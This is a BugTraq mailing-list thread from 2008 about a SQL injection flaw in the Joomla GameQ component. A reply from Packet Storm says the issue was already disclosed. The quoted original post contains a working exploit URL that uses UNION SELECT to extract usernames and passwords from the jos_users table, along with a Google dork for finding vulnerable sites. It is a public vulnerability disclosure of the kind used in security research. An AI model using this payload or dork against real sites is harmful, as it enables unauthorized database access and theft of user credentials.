BugTraq
Joomla Component GameQ Dec 04 2008 03:20PM
r3d w0rm yahoo com (1 replies)
Re: Joomla Component GameQ Dec 04 2008 10:08PM
packet packetstormsecurity org
Already discovered:

http://packetstormsecurity.org/0806-exploits/joomlagameq-sql.txt 6d9a99abd76c7d48c68ea5c98d952844 The Joomla GameQ component versions 4.0 and below suffer from a SQL injection vulnerability. Authored By <a href="mailto:His0k4.hlm[at]gmail.com">His0k4</a>

On Thu, Dec 04, 2008 at 08:20:16AM -0700, r3d.w0rm (at) yahoo (dot) com [email concealed] wrote:
> ########################################################################
#############
> #### Joomla Component GameQ ####
> ########################################################################
#############
> # #
> #AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
> #Discovered by : Sina Yazdanmehr (R3d.W0rm) #
> #Our Site : Http://IRCRASH.COM #
> #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi #
> ########################################################################
#############
> # #
> #Download : http://joomlacode.org/gf/project/gameq #
> # #
> #DORK : inurl:option=com_gameq #
> # #
> ########################################################################
#############
> # [Bug] #
> # #
> #http://Site/[path]/index.php?option=com_gameq&task=page&category_id=-99
99+union+select+0,1,2,3,4,5,username,password,8,9,10,11,12,13+from+jos_u
sers/*
> # #
> ########################################################################
#############
> # Site : Http://IRCRASH.COM #
> ###################################### TNX GOD ######################################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus